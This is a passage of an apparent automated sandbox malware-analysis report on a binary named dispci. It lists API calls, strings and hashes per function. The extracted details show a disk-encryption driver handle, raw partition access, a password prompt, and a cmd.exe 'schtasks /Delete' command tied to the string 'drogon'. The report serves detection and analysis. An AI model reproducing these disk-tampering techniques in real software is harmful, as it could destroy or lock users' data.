                                              • __amsg_exit.LIBCMT ref: 00A89EBE
                                              • __lock.LIBCMT ref: 00A89ECE
                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00A89EE2
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                              • String ID:
                                              • API String ID: 938513278-0
                                              • Opcode ID: 0786d4b998d87ce564b3a10c8d4c5cd7c72ac679ba83fc78716c828d577a7197
                                              • Instruction ID: aee61542c3cf4895020cacd284e90055673870ae62aa7c249f17c3739c48320a
                                              • Opcode Fuzzy Hash: 0786d4b998d87ce564b3a10c8d4c5cd7c72ac679ba83fc78716c828d577a7197
                                              • Instruction Fuzzy Hash: C1F0E932E44B109BDB21FBB89A0376F7BA06F00724F29454AF541A72D2DF784841CB96
                                              Function 00A850B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00A850CC
                                                • Part of subcall function 00A82020: TlsGetValue.KERNEL32(?), ref: 00A8202B
                                                • Part of subcall function 00A82020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82043
                                              • VirtualLock.KERNEL32(?,00000104), ref: 00A850FD
                                              • _wprintf.LIBCMT ref: 00A8511B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocCreateFileLockValue_wprintf
                                              • String ID: Enter password#1:
                                              • API String ID: 1727537069-3500599354
                                              • Opcode ID: 8f4fb33a6382139c1cfc46b04cfb21a8259673cdc740dfd45eb140b8f5a7d27a
                                              • Instruction ID: 51330bc2127710fbce5880710a240ec00b66999dac1e8784b2f1d10132c3d523
                                              • Opcode Fuzzy Hash: 8f4fb33a6382139c1cfc46b04cfb21a8259673cdc740dfd45eb140b8f5a7d27a
                                              • Instruction Fuzzy Hash: 6C01A7B1F9071577EE21B7F46D47B9E76689B14B24F0001A5FE05A62C1EEB19A4083D2
                                              Function 00A83120 Relevance: 6.1, APIs: 4, Instructions: 131COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A839E0: __snwprintf.LIBCMT ref: 00A83A0A
                                                • Part of subcall function 00A839E0: _malloc.LIBCMT ref: 00A83A11
                                                • Part of subcall function 00A839E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00A83A39
                                                • Part of subcall function 00A839E0: _free.LIBCMT ref: 00A83AD6
                                              • _malloc.LIBCMT ref: 00A83191
                                              • CloseHandle.KERNEL32 ref: 00A8329D
                                              • _free.LIBCMT ref: 00A832A4
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _free_malloc$CloseCreateFileHandle__snwprintf
                                              • String ID:
                                              • API String ID: 496446412-0
                                              • Opcode ID: 3843d203f5d21d9dee5ac1ac1f52a5e570dc2ec360b0b9f417b14dc1046213d2
                                              • Instruction ID: 9ed247c326aac6811bc108fcee9eaecd4c64b38a3bab24deb4c01c2b526b2eb8
                                              • Opcode Fuzzy Hash: 3843d203f5d21d9dee5ac1ac1f52a5e570dc2ec360b0b9f417b14dc1046213d2
                                              • Instruction Fuzzy Hash: 784115B2D001188BDF20FB54CC84AEA73B9FB84750F1541E9ED0A5B201EA35AF458BA1
                                              Function 00A82FB0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A835D0: _memset.LIBCMT ref: 00A835FA
                                                • Part of subcall function 00A835D0: CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00A82DD3), ref: 00A83616
                                              • _malloc.LIBCMT ref: 00A8305B
                                              • _free.LIBCMT ref: 00A830DE
                                              • CloseHandle.KERNEL32 ref: 00A830EF
                                              • _free.LIBCMT ref: 00A830F6
                                                • Part of subcall function 00A83AF0: __aullrem.LIBCMT ref: 00A83B0A
                                                • Part of subcall function 00A83AF0: _memmove.LIBCMT ref: 00A83BBC
                                                • Part of subcall function 00A83AF0: _free.LIBCMT ref: 00A83BC5
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: _free$CloseCreateFileHandle__aullrem_malloc_memmove_memset
                                              • String ID:
                                              • API String ID: 3971761140-0
                                              • Opcode ID: b83f8eb7ce2421a502e26a075d26c9a2ca226a6999101e04e527486da355b24e
                                              • Instruction ID: a55f412b3694530965e1fe9770ae472e46198198bcecd93fe4e52ede996e8cca
                                              • Opcode Fuzzy Hash: b83f8eb7ce2421a502e26a075d26c9a2ca226a6999101e04e527486da355b24e
                                              • Instruction Fuzzy Hash: 2031C377E001189BDF20BB64DD419EEB3B4EF44B60F0402A9EC1A97241EA359F51CB91
                                              Function 00A8A68E Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A8A6C2
                                              • __isleadbyte_l.LIBCMT ref: 00A8A6F5
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00A8A726
                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00A8A794
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 2a96c4dcb2594c1ab50cda2d2fa6bd4857d804135a1a9773fbbd0715b155b8d5
                                              • Instruction ID: 31dd824bc5679c8ed02065d4ea3fb91999595fa62c09daa6e941977d724363df
                                              • Opcode Fuzzy Hash: 2a96c4dcb2594c1ab50cda2d2fa6bd4857d804135a1a9773fbbd0715b155b8d5
                                              • Instruction Fuzzy Hash: 2D31C032A00255EFEB20EF64CC819AE3BB5BF11310B18857AE4659B195E730DD41EB52
                                              Function 00A847E0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstVolumeW.KERNEL32(?,00000104), ref: 00A84802
                                                • Part of subcall function 00A820A0: TlsGetValue.KERNEL32(?), ref: 00A820BD
                                                • Part of subcall function 00A820A0: _wcschr.LIBCMT ref: 00A820C8
                                                • Part of subcall function 00A820A0: _wcschr.LIBCMT ref: 00A820F8
                                                • Part of subcall function 00A820A0: __snwprintf.LIBCMT ref: 00A8210C
                                                • Part of subcall function 00A820A0: DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00A8213D
                                                • Part of subcall function 00A820A0: DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00A82196
                                              • FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00A84889
                                              • GetLastError.KERNEL32 ref: 00A8488B
                                                • Part of subcall function 00A822B0: FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00A822D6
                                                • Part of subcall function 00A822B0: GetLastError.KERNEL32(?,?,00000104), ref: 00A822DC
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: FindVolume$ControlDeviceErrorLastNext_wcschr$FirstValue__snwprintf
                                              • String ID:
                                              • API String ID: 940178688-0
                                              • Opcode ID: a385db34a4a005aadcc88bc5f72cd783474fa10d5dabeacbfb1f1a2834c60f25
                                              • Instruction ID: 8671bbbc130ed29d398d1f7f5f2f4daf329ad79ca415ce08c448a190097c86a6
                                              • Opcode Fuzzy Hash: a385db34a4a005aadcc88bc5f72cd783474fa10d5dabeacbfb1f1a2834c60f25
                                              • Instruction Fuzzy Hash: 6821B372B002089BDF20FB65ED85ABE73B5FB88311F5505ADE91A97190EE309E45CF90
                                              Function 00A81710 Relevance: 6.1, APIs: 4, Instructions: 57memoryfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileSizeEx.KERNEL32(?,?), ref: 00A81723
                                              • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00A81744
                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00A8175D
                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000,00000000,?,?,?), ref: 00A81779
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: File$AllocLocalPointerReadSize
                                              • String ID:
                                              • API String ID: 3779513235-0
                                              • Opcode ID: 35069fb18431dd21c2982b413a004c5b7d519f3775b40922115feafd1399ce6b
                                              • Instruction ID: ffd59f7d732d5099b15f7d627702f1e035e34fb86e46a004dcb9d05899074422
                                              • Opcode Fuzzy Hash: 35069fb18431dd21c2982b413a004c5b7d519f3775b40922115feafd1399ce6b
                                              • Instruction Fuzzy Hash: B9112175A00219AFDF10EBA58C49BBFB7BCEB04710F204959A959E3240EB749A158F50
                                              Function 00A8FE23 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                              • Instruction ID: 1ecc06126e7c676ec84c842ecdcf15b2b25298133c5c73db476f03047be2a898
                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                              • Instruction Fuzzy Hash: EE110E7240018ABFCF266F84DC41CEE3F66BB19394B598425FE1859131D736C9B1AB81
                                              Function 00A8AD9E Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32(00000000,00A866A9), ref: 00A8ADA1
                                              • __malloc_crt.LIBCMT ref: 00A8ADD0
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A8ADDD
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                              • String ID:
                                              • API String ID: 237123855-0
                                              • Opcode ID: 369c9ddee4040b3de23e6aedeb71b59f9f72306a1ac1dbf46804320add5fa267
                                              • Instruction ID: 17d06a226e5036f4692b9634af12a1bd8324494857167d576d328275be1f59a9
                                              • Opcode Fuzzy Hash: 369c9ddee4040b3de23e6aedeb71b59f9f72306a1ac1dbf46804320add5fa267
                                              • Instruction Fuzzy Hash: CEF0A77B5054106BEF31B774BC499AB6778DEF236231A8517F801C3610FA208E4787B2
                                              Function 00A85B90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30threadCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              • CreateThread.KERNEL32(00000000,00000000,00A85A50,00000000,00000000,00000000), ref: 00A85BD8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Create$DirectoryEnvironmentProcessSystemThreadVariable_vswprintf_slstrcat
                                              • String ID: drogon$schtasks /Delete /F /TN %ws
                                              • API String ID: 2360524982-1803547564
                                              • Opcode ID: 5a16323f58ef87ba026267723a200ba3c42c1c8de80b554c10b3aef3b3c601ad
                                              • Instruction ID: 764a991926f38107854f3834e94d4e569304da6fa8a22e2e9d826f006776ba3c
                                              • Opcode Fuzzy Hash: 5a16323f58ef87ba026267723a200ba3c42c1c8de80b554c10b3aef3b3c601ad
                                              • Instruction Fuzzy Hash: 57F09BB0F8170CB7EB10FBB49D87F797364E700B00FA00665BA066A2C2DDB06D084785